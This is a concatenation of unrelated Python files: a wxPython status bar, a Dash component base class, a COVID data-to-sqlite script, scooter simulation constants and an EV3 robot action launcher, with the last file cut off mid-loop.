self.AddWidget(self.conn_time , horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.conn_status , horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.activity_blinker, horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.spacer , horizontalalignment = ESB.ESB_EXACT_FIT)
self.update_timer = wx.CallLater(1000, self.UpdateConnectionStatus)
self.status_timer = None
self.LayoutWidgets()
    def Destroy(self):
        if self.update_timer and self.update_timer.IsRunning(): self.update_timer.Stop()
        if self.status_timer and self.status_timer.IsRunning(): self.status_timer.Stop()
        return super(StatusBar, self).Destroy()  # let wx actually tear the window down
def UpdateConnectionStatus(self, evt = None):
self.update_timer.Restart(1000)
conn = self.connection
if conn.is_connected():
self.conn_status.SetBackgroundColour(wx.GREEN)
self.conn_status.Refresh()
else:
self.conn_status.SetBackgroundColour(wx.RED)
self.conn_status.Refresh()
self.conn_time.SetLabel('')
self.conn_time.SetToolTip(None)
self.LayoutWidgets()
return
if conn.connect_time:
if not self.conn_time.GetToolTip():
conn_time = time.localtime(conn.connect_time)
self.conn_time.SetToolTip(time.strftime('Connected since: %c', conn_time))
ctime = time.time() - conn.connect_time
dd, rest = divmod(ctime, 3600 * 24)
hh, rest = divmod(rest, 3600)
mm, ss = divmod(rest, 60)
conn_time_str = '%02d:%02d:%02d:%02d' % (dd, hh, mm, ss)
else:
conn_time_str = '--:--:--:--'
self.conn_time.SetLabel(conn_time_str)
def LayoutWidgets(self):
# calculate a reasonable size for "connected time"
self.conn_time.SetLabel('00:00:00:00')
conn_time_size = self.conn_time.GetClientSize()
self.conn_time.SetLabel('')
# Iterate the features, add icons
        for f, i in self.feature_icons.items():
            i.Show(f in self.connection.features)
self.feature_tray.Fit()
self.SetStatusWidths(
[-1, # status pane
self.feature_tray.GetSize().width, # feature icons
conn_time_size.Width + 3, # conn timer
self.GetSize().height + 2, # status light
12, # activity blinker
self.GetSize().height + 2, # placeholder
])
self.OnSize(None)
def AddStatus(self, status):
self.SetStatusText(status, 2)
        if self.status_timer and self.status_timer.IsRunning():
            self.status_timer.Restart(10000)
        else:
            self.status_timer = wx.CallLater(10000, self.ClearStatus)
def ClearStatus(self):
self.SetStatusText('', 2)
def StartBlinker(self):
if self.blinker_timer and self.blinker_timer.IsRunning(): return
new_bg = (wx.RED if self.activity_blinker.GetBackgroundColour() != wx.RED else None)
self.activity_blinker.SetBackgroundColour(new_bg)
self.activity_blinker.Refresh()
self.activity_blinker.SetToolTip("New text has arrived")
self.blinker_timer = wx.CallLater(1000, self.StartBlinker)
def StopBlinker(self):
if self.blinker_timer and self.blinker_timer.IsRunning():
self.blinker_timer.Stop()
self.activity_blinker.SetBackgroundColour(None)
self.activity_blinker.SetToolTip(None)
class FeatureIcon(wx.Panel):
def __init__(self, parent, i, w):
wx.Panel.__init__(self, parent)
wx.StaticBitmap(self, -1, w)
self.SetToolTip(i + " enabled")
# Bind mouse events to the bitmaps inside the panel, add "hand" cursor
def Bind(self, evt, handler):
if evt == wx.EVT_LEFT_UP:
self.SetCursor(wx.Cursor(wx.CURSOR_HAND))
for c in self.GetChildren():
c.Bind(evt, handler)
super(FeatureIcon, self).Bind(evt, handler)
|
#!/bin/python
import sys
if "recent_outputs" in sys.argv[1]:
import mine.generate_gallery
mine.generate_gallery(sys.argv[1])
else:
print ("special_execute does not know how to handle ", sys.argv[1])
|
import collections
import collections.abc
import copy
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
class Component(collections.abc.MutableMapping):
def __init__(self, **kwargs):
for k, v in list(kwargs.items()):
if k not in self._prop_names:
# TODO - What's the right exception here?
raise Exception(
'Unexpected keyword argument `{}`'.format(k) +
'\nAllowed arguments: {}'.format(
', '.join(sorted(self._prop_names))
)
)
setattr(self, k, v)
def to_plotly_json(self):
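        # Serialize to the {'props': ..., 'type': ..., 'namespace': ...} dict
        # shape that the Dash renderer consumes.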
as_json = {
'props': {p: getattr(self, p)
for p in self._prop_names
if hasattr(self, p)},
'type': self._type,
'namespace': self._namespace
}
return as_json
def _check_if_has_indexable_children(self, item):
if (not hasattr(item, 'children') or
(not isinstance(item.children, Component) and
                 not isinstance(item.children, collections.abc.MutableSequence))):
raise KeyError
def _get_set_or_delete(self, id, operation, new_item=None):
self._check_if_has_indexable_children(self)
if isinstance(self.children, Component):
if getattr(self.children, 'id', None) is not None:
# Woohoo! It's the item that we're looking for
if self.children.id == id:
if operation == 'get':
return self.children
elif operation == 'set':
self.children = new_item
return
elif operation == 'delete':
self.children = None
return
# Recursively dig into its subtree
try:
if operation == 'get':
return self.children.__getitem__(id)
elif operation == 'set':
self.children.__setitem__(id, new_item)
return
elif operation == 'delete':
self.children.__delitem__(id)
return
except KeyError:
pass
# if children is like a list
        if isinstance(self.children, collections.abc.MutableSequence):
for i, item in enumerate(self.children):
# If the item itself is the one we're looking for
if getattr(item, 'id', None) == id:
if operation == 'get':
return item
elif operation == 'set':
self.children[i] = new_item
return
elif operation == 'delete':
del self.children[i]
return
# Otherwise, recursively dig into that item's subtree
# Make sure it's not like a string
elif isinstance(item, Component):
try:
if operation == 'get':
return item.__getitem__(id)
elif operation == 'set':
item.__setitem__(id, new_item)
return
elif operation == 'delete':
item.__delitem__(id)
return
except KeyError:
pass
# The end of our branch
# If we were in a list, then this exception will get caught
raise KeyError(id)
# Supply ABC methods for a MutableMapping:
# - __getitem__
# - __setitem__
# - __delitem__
# - __iter__
# - __len__
def __getitem__(self, id):
"""Recursively find the element with the given ID through the tree
of children.
"""
# A component's children can be undefined, a string, another component,
# or a list of components.
return self._get_set_or_delete(id, 'get')
def __setitem__(self, id, item):
"""Set an element by its ID."""
return self._get_set_or_delete(id, 'set', item)
def __delitem__(self, id):
"""Delete items by ID in the tree of children."""
return self._get_set_or_delete(id, 'delete')
def traverse(self):
"""Yield each item in the tree."""
children = getattr(self, 'children', None)
# children is just a component
if isinstance(children, Component):
yield children
for t in children.traverse():
yield t
# children is a list of components
        elif isinstance(children, collections.abc.MutableSequence):
for i in children:
yield i
if isinstance(i, Component):
for t in i.traverse():
yield t
def __iter__(self):
"""Yield IDs in the tree of children."""
for t in self.traverse():
if (isinstance(t, Component) and
getattr(t, 'id', None) is not None):
yield t.id
def __len__(self):
"""Return the number of items in the tree."""
# TODO - Should we return the number of items that have IDs
# or just the number of items?
# The number of items is more intuitive but returning the number
# of IDs matches __iter__ better.
length = 0
if getattr(self, 'children', None) is None:
length = 0
elif isinstance(self.children, Component):
length = 1
length += len(self.children)
        elif isinstance(self.children, collections.abc.MutableSequence):
for c in self.children:
length += 1
if isinstance(c, Component):
length += len(c)
else:
# string or number
length = 1
return length
def generate_class(typename, props, description, namespace):
# Dynamically generate classes to have nicely formatted docstrings,
# keyword arguments, and repr
    # Inspired by http://jameso.be/2013/08/06/namedtuple.html
    # TODO - Tab out the repr for the repr of these components to make it
    # look more like a hierarchical tree
# TODO - Include "description" "defaultValue" in the repr and docstring
#
# TODO - Handle "required"
#
# TODO - How to handle user-given `null` values? I want to include
# an expanded docstring like Dropdown(value=None, id=None)
# but by templating in those None values, I have no way of knowing
# whether a property is None because the user explicitly wanted
# it to be `null` or whether that was just the default value.
# The solution might be to deal with default values better although
# not all component authors will supply those.
c = '''class {typename}(Component):
"""{docstring}
"""
def __init__(self, {default_argtext}):
self._prop_names = {list_of_valid_keys}
self._type = '{typename}'
self._namespace = '{namespace}'
self.available_events = {events}
self.available_properties = {list_of_valid_keys}
for k in {required_args}:
if k not in kwargs:
raise Exception(
'Required argument `' + k + '` was not specified.'
)
super({typename}, self).__init__({argtext})
def __repr__(self):
if(any(getattr(self, c, None) is not None for c in self._prop_names
if c is not self._prop_names[0])):
return (
'{typename}(' +
', '.join([c+'='+repr(getattr(self, c, None))
for c in self._prop_names
if getattr(self, c, None) is not None])+')')
else:
return (
'{typename}(' +
repr(getattr(self, self._prop_names[0], None)) + ')')
'''
filtered_props = reorder_props(filter_props(props))
list_of_valid_keys = repr(list(filtered_props.keys()))
docstring = create_docstring(
typename,
filtered_props,
parse_events(props),
description
)
events = '[' + ', '.join(parse_events(props)) + ']'
if 'children' in props:
default_argtext = 'children=None, **kwargs'
argtext = 'children=children, **kwargs'
else:
default_argtext = '**kwargs'
argtext = '**kwargs'
required_args = required_props(props)
d = c.format(**locals())
scope = {'Component': Component}
exec(d, scope)
result = scope[typename]
return result
def required_props(props):
return [prop_name for prop_name, prop in list(props.items())
if prop['required']]
def reorder_props(props):
# If "children" is a prop, then move it to the front to respect
# dash convention
if 'children' in props:
props = collections.OrderedDict(
[('children', props.pop('children'), )] +
list(zip(list(props.keys()), list(props.values())))
)
return props
def parse_events(props):
if ('dashEvents' in props and
props['dashEvents']['type']['name'] == 'enum'):
events = [v['value'] for v in props['dashEvents']['type']['value']]
else:
events = []
return events
def create_docstring(name, props, events, description):
if 'children' in props:
props = collections.OrderedDict(
[['children', props.pop('children')]] +
list(zip(list(props.keys()), list(props.values())))
)
return '''A {name} component.{description}
Keyword arguments:
{args}
Available events: {events}'''.format(
name=name,
description='\n{}'.format(description),
args='\n'.join(
['- {}'.format(argument_doc(
p, prop['type'], prop['required'], prop['description']
)) for p, prop in list(filter_props(props).items())]
),
events=', '.join(events)
).replace(' ', '')
def filter_props(args):
filtered_args = copy.deepcopy(args)
for arg_name, arg in list(filtered_args.items()):
if 'type' not in arg:
filtered_args.pop(arg_name)
continue
arg_type = arg['type']['name']
if arg_type in ['func', 'symbol', 'instanceOf']:
filtered_args.pop(arg_name)
# dashEvents are a special oneOf property that is used for subscribing
# to events but it's never set as a property
if arg_name in ['dashEvents']:
filtered_args.pop(arg_name)
return filtered_args
def js_to_py_type(type_object):
js_type_name = type_object['name']
# wrapping everything in lambda to prevent immediate execution
js_to_py_types = {
'array': lambda: 'list',
'bool': lambda: 'boolean',
'number': lambda: 'number',
'string': lambda: 'string',
'object': lambda: 'dict',
'any': lambda: 'boolean | number | string | dict | list',
'element': lambda: 'dash component',
'node': lambda: (
'a list of or a singular dash component, string or number'
),
# React's PropTypes.oneOf
'enum': lambda: 'a value equal to: {}'.format(', '.join([
'{}'.format(str(t['value'])) for t in type_object['value']
])),
# React's PropTypes.oneOfType
'union': lambda: '{}'.format(' | '.join([
'{}'.format(js_to_py_type(subType))
for subType in type_object['value'] if js_to_py_type(subType) != ''
])),
# React's PropTypes.arrayOf
        'arrayOf': lambda: 'list {}'.format(
            'of {}s'.format(js_to_py_type(type_object['value']))
            if js_to_py_type(type_object['value']) != ''
            else ''
        ).strip(),
# React's PropTypes.objectOf
'objectOf': lambda: (
'dict with strings as keys and values of type {}'
).format(js_to_py_type(type_object['value'])),
# React's PropTypes.shape
'shape': lambda: (
'dict containing keys {}.\n{}'.format(
', '.join(
["'{}'".format(t) for t in
list(type_object['value'].keys())]
),
'Those keys have the following types: \n{}'.format(
'\n'.join([
' - ' + argument_doc(
prop_name,
prop,
prop['required'],
prop.get('description', '')
) for
prop_name, prop in list(type_object['value'].items())
])
)
)
)
}
if 'computed' in type_object and type_object['computed']:
return ''
if js_type_name in js_to_py_types:
return js_to_py_types[js_type_name]()
else:
return ''
def argument_doc(arg_name, type_object, required, description):
py_type_name = js_to_py_type(type_object)
if '\n' in py_type_name:
return (
'{name} ({is_required}): {description}. '
'{name} has the following type: {type}'
).format(
name=arg_name,
type=py_type_name,
description=description,
is_required='required' if required else 'optional'
)
else:
return '{name} ({type}{is_required}){description}'.format(
name=arg_name,
type='{}; '.format(py_type_name) if py_type_name else '',
description=(
': {}'.format(description) if description != '' else ''
),
is_required='required' if required else 'optional'
)
|
import sqlite3
import json
import os
import requests
#Database setup
def setUpDatabase(db_name):
''' This function sets up a database. It will return a cursor and connector. '''
path = os.path.dirname(os.path.abspath(__file__))
conn = sqlite3.connect(path+'/'+ db_name)
cur = conn.cursor()
return cur, conn
def create_month_table(cur, conn):
''' This function takes in cursor and connector (cur and conn) and creates a table within the
database that has the name of the month. This function will be used to retrive the name of the month and
insert it into the death table to allow for easier calculations. '''
    cur.execute('CREATE TABLE Months (key TEXT PRIMARY KEY, month_name TEXT)')
    monthLst = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
    # keys are zero-padded two-digit month numbers ("01".."12") so they match the
    # month portion of the date strings stored in the DEATH table
    for i, month in enumerate(monthLst, start=1):
        cur.execute("INSERT INTO Months (key, month_name) VALUES (?, ?)", (str(i).zfill(2), month))
    conn.commit()
def create_death_table(cur, conn):
''' This function takes in cur and conn as parameters and creates the table for COVID
death data (total deaths and new deaths confirmed), located in the database. '''
    cur.execute('CREATE TABLE IF NOT EXISTS DEATH (key TEXT PRIMARY KEY, date TEXT UNIQUE, month TEXT, death INTEGER, deathConfirmed INTEGER)')
conn.commit()
def get_data():
''' This function creates the URL for the API request. It requires information on
the state- michigan (in the US) for which data will be gathered. It returns the data. '''
base_url = "https://api.covidtracking.com/v1/states/mi/daily.json"
r = requests.get(base_url)
data = json.loads(r.text)
return data
def add_to_death_table(cur,conn,lst):
''' This function creates a list of strings for months May - October.
This function loops adds the necessary data to the Death table. For each date in the time period,
it adds a key, date (2020MONTHDAY), individual months (May- October), total deaths in michigan to date, and new confirmed deaths in michigan to date.
This function adds 25 unique pieces of data into the table at a time. '''
stringLst = ["05", "06", "07","08","09","10"]
cur.execute('SELECT COUNT(*) FROM DEATH')
rows = cur.fetchone()[0]
final = rows + 25
    for i in range(len(lst) - 1):  # stop one entry early: each row needs the next (older) entry
        if rows < final and rows <= len(lst):
            if str(lst[i]["date"])[4:6] in stringLst:
                deathConfirmed = lst[i]["deathConfirmed"] - lst[i + 1]["deathConfirmed"]
                totalDeath = lst[i]["death"]
                date = lst[i]["date"]
                cur.execute('SELECT month_name FROM Months WHERE key = ?', (str(date)[4:6],))
                month = cur.fetchone()[0]
                cur.execute("INSERT OR IGNORE INTO DEATH (key, date, month, death, deathConfirmed) VALUES (?, ?, ?, ?, ?)",
                            (rows, date, month, totalDeath, deathConfirmed))
                cur.execute('SELECT COUNT(*) FROM DEATH')
                rows = cur.fetchone()[0]
conn.commit()
def keep_running(cur, conn, lst):
''' This function asks the user if they would like to add the next 25 rows
to the table. If the user inputs no, it ends the program. If the user inputs
yes, it adds the next 25 unique rows of data, and asks if it should input 25 more. When
there is no more data to input, the program prints "Data input complete" and exits the
program. '''
x = input("Would you like to add 25 rows? Please enter 'yes' or 'no'.")
while x != 'no':
cur.execute('SELECT COUNT(*) FROM DEATH')
row = cur.fetchone()[0]
if row + 25 > 185:
add_to_death_table(cur, conn, lst)
print("Data input complete")
break
else:
add_to_death_table(cur, conn, lst)
x = input("Would you like to add 25 rows? Please enter 'yes' or 'no'.")
def main():
''' This function sets up the database and tables, stores information in dictionary,
loops through dictionary and adds appropriate data to death table, 25 unique items at a time. '''
# SETUP DATABASE AND TABLE
cur, conn = setUpDatabase('covid_tracking.db')
#create_month_table(cur, conn)
create_death_table(cur, conn)
lst = get_data()
#add_to_death_table(cur,conn,lst)
keep_running(cur,conn,lst)
if __name__ == "__main__":
main()
|
import os
GEOSPATIAL_BOUND = (59.9112, 59.9438, 10.7027, 10.7772)
GEOSPATIAL_BOUND_NEW = (59.9040, 59.9547, 10.6478, 10.8095)
MAX_DISTANCE = 12
CLUSTER_CENTER_DELTA = 0.01
# Colors for visualizer
BLUE, GREEN, RED, BLACK, WHITE = "blue", "green", "red", "black", "white"
# Speed of service vehicles
VEHICLE_SPEED = 30
MINUTES_IN_HOUR = 60
# Inventory of vehicle
BATTERY_INVENTORY = 50
SCOOTER_INVENTORY = 20
# Depot parameters
MAIN_DEPOT_LOCATION = (59.931794, 10.788314)
SMALL_DEPOT_LOCATIONS = [(59.908009, 10.741604), (59.944473, 10.748624)]
MAIN_DEPOT_CAPACITY = 10000
SMALL_DEPOT_CAPACITY = 100
CHARGE_TIME_PER_BATTERY = 60
SWAP_TIME_PER_BATTERY = 0.4
# Speed of scooter, ref. Fearnley et al. (2020, section 3.6)
SCOOTER_SPEED = 7
# Default simulation constants
ITERATION_LENGTH_MINUTES = 20
NUMBER_OF_ROLLOUTS = 50
BATTERY_LIMIT = 20.0
DISCOUNT_RATE = 0.80
# Negative reward for lost trips
LOST_TRIP_REWARD = -0.1
# Testing parameters
NUMBER_OF_NEIGHBOURS = 3
SHIFT_DURATION = 300
SAMPLE_SIZE = 500
NUMBER_OF_CLUSTERS = 30
# different policies: "RandomRolloutPolicy", "SwapAllPolicy"
POLICIES = ["RandomRolloutPolicy", "SwapAllPolicy"]
STATE_CACHE_DIR = "test_state_cache"
# Test data directory
TEST_DATA_DIRECTORY = "test_data"
# RUNTIME SETTINGS
SEED = 69
# Visualization parameters
ACTION_OFFSET = 0.018
COLORS = [
"#B52CC2",
"#EF9A90",
"#43C04E",
"#CDCAE9",
"#C00283",
"#02BE50",
"#D69F94",
"#A4847E",
"#CE058B",
"#39029A",
"#9EEB33",
"#056672",
"#FC726E",
"#8C109C",
"#D8FB27",
"#BBE5D1",
"#FEEB81",
"#126027",
"#7666E7",
"#530788",
"#A281ED",
"#954701",
"#B42760",
"#F0E466",
"#A32315",
"#4886E8",
"#117427",
"#A3A66A",
"#F124AC",
"#4572BD",
"#93EB5F",
"#ECDCCD",
"#48317F",
"#DF8547",
"#1DE961",
"#5BD669",
"#4FAA9B",
"#937016",
"#840FF6",
"#3EAEFD",
"#F6F34D",
"#015133",
"#59025B",
"#F03B29",
"#53A912",
"#34058C",
"#FA928D",
"#3C70C3",
"#AB9869",
"#B6BD37",
"#693C24",
"#2588F7",
"#54B006",
"#6604CE",
"#4A4329",
"#0175B1",
"#177982",
"#544FAD",
"#DD5409",
"#583ED1",
"#CD9D69",
"#6B0BCE",
"#D14B12",
"#96725D",
"#BB137F",
"#7B53B5",
"#BFFB24",
"#F9D08F",
"#CF03B8",
"#A6F591",
"#D7CFDB",
"#2D4AD6",
"#BC5286",
"#6245C8",
"#E40EB7",
"#E2DA97",
"#EE5089",
"#CAF026",
"#668981",
"#8E424B",
"#49633D",
"#8A4CE4",
"#827C33",
"#35EFF2",
"#325041",
"#2BC23F",
"#44857A",
"#DA0043",
"#87A43F",
"#D4FCEC",
"#9FD87C",
"#0D36DF",
"#241B73",
"#524526",
"#163F53",
"#4C9B58",
"#00F4DB",
"#20054B",
"#82026F",
"#CA561D",
"#F94B06",
"#5CCBDB",
"#8B6882",
"#9C28B0",
"#15357B",
"#BB00F4",
"#451918",
"#B94AE1",
"#698290",
"#415697",
"#61B95D",
"#957BD8",
"#01A1C5",
"#69E54F",
"#D40C21",
"#08A810",
"#05ECC3",
"#8FA2B5",
"#D45A2C",
"#1689EA",
"#7DD21F",
"#A615B6",
"#430E4C",
"#557F16",
"#68E3A4",
"#E19180",
"#8B0197",
"#7314C4",
"#A397DA",
"#175ACE",
"#6185AD",
"#D981A8",
"#984ED3",
"#37FFF0",
"#90BB50",
"#A818B0",
"#28F263",
"#700EA8",
"#5C0D3A",
"#CAF06F",
"#815F36",
"#CCF509",
"#21C91D",
"#D09B45",
"#282AF6",
"#053525",
"#0FAE75",
"#213E02",
"#1572AA",
"#9D9A3A",
"#1C1DA9",
"#C6A728",
"#0BE59B",
"#272CAF",
"#75BA93",
"#E29981",
"#45F101",
"#D8BA19",
"#BF7545",
"#0F85B1",
"#E6DC7B",
"#6B6548",
"#78B075",
"#AFDF4D",
"#D0BD94",
"#C6F81B",
"#27C209",
"#3C6574",
"#2CE0B3",
"#9C6E06",
"#53CECD",
"#A5EC06",
"#AA83D6",
"#7705D2",
"#806015",
"#881E9E",
"#617730",
"#1F9ACF",
"#8AE30F",
"#D1E1B4",
"#D924F6",
"#5FE267",
"#6BDDF2",
"#5E40A5",
"#9B1580",
"#B6E49C",
"#619C46",
"#504BDE",
]
|
from .authorization_handler import AuthorizationHandler
from .db_session_manager import DBSessionManager
from .json_decoder import JSONDecoder
|
#!/usr/bin/env python3
from ev3dev2.motor import MoveSteering, MoveTank, MediumMotor, LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D
from ev3dev2.sensor.lego import TouchSensor, ColorSensor, GyroSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.button import Button
import xml.etree.ElementTree as ET
import threading
import time
from sys import stderr
import os
# import the functions
from functions.Do_nothing import Do_nothing
from functions.off import off
from functions.Delay_seconds import Delay_seconds
from functions.Motor_onForRotations import Motor_onForRotations
from functions.Motor_onForSeconds import Motor_onForSeconds
from functions.Steering_rotations import Steering_rotations
from functions.Steering_seconds import Steering_seconds
from functions.Tank_rotations import Tank_rotations
from functions.Tank_seconds import Tank_seconds
from functions.Reset_gyro import Reset_gyro
from functions.StraightGyro_target import StraightGyro_target
from functions.StraightGyro_current import StraightGyro_current
from functions.StraightGyro_target_toLine import StraightGyro_target_toLine
from functions.StraightGyro_current_toLine import StraightGyro_current_toLine
from functions.StraightGyro_target_colourStop import StraightGyro_target_colourStop
from functions.Turn_degrees import Turn_degrees
from functions.Turn_from_start_position import Turn_from_start_position
from functions.BlackLine_rotations import BlackLine_rotations
from functions.squareOnLine import squareOnLine
from functions.squareOnLineWhite import squareOnLineWhite
# define the different sensors, motors and motor blocks
button = Button()
colourAttachment = ColorSensor(INPUT_4)
colourLeft = ColorSensor(INPUT_3)
colourRight = ColorSensor(INPUT_2)
gyro = GyroSensor(INPUT_1)
largeMotor_Left= LargeMotor(OUTPUT_B)
largeMotor_Right= LargeMotor(OUTPUT_C)
mediumMotor = MediumMotor(OUTPUT_D)
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
tank_block = MoveTank(OUTPUT_B, OUTPUT_C)
# check if the key has been removed
def isKeyTaken(rProgram, gProgram, bProgram):
    # return True if the key was removed
    rgbA = colourAttachment.raw
    # compare the current values to the values recorded when the key was inserted
    # (rgb values are 50, 62, 57 when the slot is empty)
    return abs(rgbA[0] - rProgram) > 12 and abs(rgbA[1] - gProgram) > 12 and abs(rgbA[2] - bProgram) > 12
# calibrate the colourAttachment values for the different keys
def colourAttachment_values():
stop = False
# set a larger font
os.system('setfont Lat15-TerminusBold14') # os.system('setfont Lat15-TerminusBold32x16')
# print instructions and collect the rgb values for each key
print('Insert red', file=stderr)
print('Insert red')
button.wait_for_pressed(['enter'])
red = colourAttachment.raw
print('Next.')
print('Insert green', file=stderr)
print('Insert green')
button.wait_for_pressed(['enter'])
green = colourAttachment.raw
print('Next.')
print('Insert white', file=stderr)
print('Insert white')
button.wait_for_pressed(['enter'])
white = colourAttachment.raw
print('Next.')
print('Insert black', file=stderr)
print('Insert black')
button.wait_for_pressed(['enter'])
black = colourAttachment.raw
print('Next.')
print('Insert yellow', file=stderr)
print('Insert yellow')
button.wait_for_pressed(['enter'])
yellow = colourAttachment.raw
print('Next.')
print('Insert blue', file=stderr)
print('Insert blue')
button.wait_for_pressed(['enter'])
blue = colourAttachment.raw
print('Done!')
button.wait_for_pressed(['enter'])
# return the values for the different keys
attachment_values = [red, green, white, black, yellow, blue]
return attachment_values
# launch actions using threads
def launchStep(stop, action):
# compare the 'name' to the functions and start a thread with the matching function
# return the thread to be added to the threadPool
name = action.get('action')
if name == 'Do_nothing': # (stop)
print("Do_nothing", file= stderr)
thread = threading.Thread(target=Do_nothing, args=(stop,))
thread.start()
return thread
if name == 'off': # ()
print("Motors off", file=stderr)
thread = threading.Thread(target=off)
thread.start()
return thread
if name == 'Delay_seconds': # (stop, seconds)
print("Starting Delay_seconds", file=stderr)
seconds = float(action.get('seconds'))
thread = threading.Thread(target=Delay_seconds, args=(stop, seconds))
thread.start()
return thread
if name == 'Motor_onForRotations': # (stop, motor, speed, rotations, gearRatio)
print("Starting Motor_onForRotations", file=stderr)
motor = action.get('motor')
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
gearRatio = float(action.get('gearRatio'))
if (motor == "largeMotor_Left"):
motorToUse = largeMotor_Left
if (motor == "largeMotor_Right"):
motorToUse = largeMotor_Right
if (motor == "mediumMotor"):
motorToUse = mediumMotor
thread = threading.Thread(target=Motor_onForRotations, args=(stop, motorToUse, speed, rotations, gearRatio))
thread.start()
return thread
if name == 'Motor_onForSeconds': # (stop, motor, speed, seconds)
print("Starting Motor_onForSeconds", file=stderr)
motor = action.get('motor')
speed = float(action.get('speed'))
seconds = float(action.get('seconds'))
if (motor == "largeMotor_Left"):
motorToUse = largeMotor_Left
if (motor == "largeMotor_Right"):
motorToUse = largeMotor_Right
if (motor == "mediumMotor"):
motorToUse = mediumMotor
thread = threading.Thread(target=Motor_onForSeconds,args=(stop, motorToUse, speed, seconds))
thread.start()
return thread
if name == 'Steering_rotations': # (stop, speed, rotations, steering)
print("Starting Steering_rotations", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
steering = float(action.get('steering'))
brake = action.get('brake') == 'True' # compare the string: bool() of any non-empty string is True; value currently unused
thread = threading.Thread(target=Steering_rotations, args=(stop, speed, rotations, steering))
thread.start()
return thread
if name == 'Steering_seconds': # (stop, speed, seconds, steering)
print("Starting Steering_seconds", file=stderr)
speed = float(action.get('speed'))
seconds = float(action.get('seconds'))
steering = float(action.get('steering'))
thread = threading.Thread(target=Steering_seconds, args=(stop, speed, seconds, steering))
thread.start()
return thread
if name == 'Tank_rotations': # (stop, left_speed, right_speed, rotations)
print("Starting Tank_rotations", file=stderr)
left_speed = float(action.get('left_speed'))
right_speed = float(action.get('right_speed'))
rotations = float(action.get('rotations'))
thread = threading.Thread(target = Tank_rotations, args=(stop, left_speed, right_speed, rotations))
thread.start()
return thread
if name == 'Tank_seconds': # (stop, left_speed, right_speed, seconds)
print("Starting Tank_seconds", file=stderr)
left_speed = float(action.get('left_speed'))
right_speed = float(action.get('right_speed'))
seconds = float(action.get('seconds'))
thread = threading.Thread(target = Tank_seconds, args=(stop, left_speed, right_speed, seconds))
thread.start()
return thread
if name == 'Reset_gyro': # ()
print("Starting Reset_gyro", file=stderr)
thread = threading.Thread(target=Reset_gyro)
thread.start()
return thread
if name == 'StraightGyro_target': # (stop, speed, rotations, target)
print("Starting StraightGyro_target", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
target = float(action.get('target'))
thread = threading.Thread(target=StraightGyro_target, args=(stop, speed, rotations, target))
thread.start()
return thread
if name == 'StraightGyro_target_colourStop': # (stop, speed, target, sensor, value)
print("Starting StraightGyro_target_colourStop", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
sensor = action.get('sensor')
value = float(action.get('value'))
thread = threading.Thread(target=StraightGyro_target_colourStop, args=(stop, speed, target, sensor, value))
thread.start()
return thread
if name == 'StraightGyro_current': # (stop, speed, rotations)
print("Starting StraightGyro_current", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
thread = threading.Thread(target=StraightGyro_current, args=(stop, speed, rotations))
thread.start()
return thread
if name == 'StraightGyro_target_toLine': # (stop, speed, rotations, target, whiteOrBlack)
print("Starting StraightGyro_target", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
target = float(action.get('target'))
whiteOrBlack = action.get('whiteOrBlack')
thread = threading.Thread(target=StraightGyro_target_toLine, args=(stop, speed, rotations, target, whiteOrBlack))
thread.start()
return thread
if name == 'StraightGyro_current_toLine': # (stop, speed, rotations, whiteOrBlack)
print("Starting StraightGyro_current", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
whiteOrBlack = action.get('whiteOrBlack')
thread = threading.Thread(target=StraightGyro_current_toLine, args=(stop, speed, rotations, whiteOrBlack))
thread.start()
return thread
if name == 'Turn_degrees': # (stop, speed, degrees)
print("Starting Turn_degrees", file=stderr)
speed = float(action.get('speed'))
degrees = float(action.get('degrees'))
thread = threading.Thread(target = Turn_degrees, args=(stop, speed, degrees))
thread.start()
return thread
if name == 'Turn_from_start_position': # (stop, speed, degrees)
print('Starting Turn_from_start_position', file=stderr)
speed = float(action.get('speed'))
degrees = float(action.get('degrees'))
thread = threading.Thread(target = Turn_from_start_position, args=(stop, speed, degrees))
thread.start()
return thread
if name == 'squareOnLine': # (stop, speed, target)
print("Starting squareOnLine", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
thread = threading.Thread(target=squareOnLine, args=(stop, speed, target))
thread.start()
return thread
if name == 'squareOnLineWhite': # (stop, speed, target)
print("Starting squareOnLine White", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
thread = threading.Thread(target=squareOnLineWhite, args=(stop, speed, target))
thread.start()
return thread
if name == 'Blacklinetestinghome': # (stop, speed, correction)
print("Blackline testing home", file=stderr)
speed = float(action.get('speed'))
correction = float(action.get('correction'))
thread = threading.Thread(target=Blacklinetestinghome, args=(stop, speed, correction))
thread.start()
return thread
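# A hedged sketch (not wired in above) of how the if-chain could shrink into a
# dispatch table: map each 'action' name to its target function plus the float
# parameters it expects, then build the args tuple generically.
# _DISPATCH = {
#     'Delay_seconds': (Delay_seconds, ('seconds',)),
#     'Tank_seconds': (Tank_seconds, ('left_speed', 'right_speed', 'seconds')),
# }
# def launchStep_table(stop, action):
#     target, params = _DISPATCH[action.get('action')]
#     args = (stop,) + tuple(float(action.get(p)) for p in params)
#     thread = threading.Thread(target=target, args=args)
#     thread.start()
#     return thread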
# main section of the program
def main():
# create dictionaries and variables
threadPool = []
actions = []
stopProcessing = False
# open and read the overall XML file
programXML = ET.parse('overall_programming.xml')
programs = programXML.getroot()
attachment_values = colourAttachment_values()
while True:
# reset stopProcessing each repetition
stopProcessing = False
# collect the raw rgb light values from colourAttachment and the overall XML file
rgb = colourAttachment.raw
for program in programs:
programName = program.get('name')
colourValue = int(program.get('colourValue'))
# use the calibrated values in comparison
colourProgram = attachment_values[colourValue]
rProgram = colourProgram[0]
gProgram = colourProgram[1]
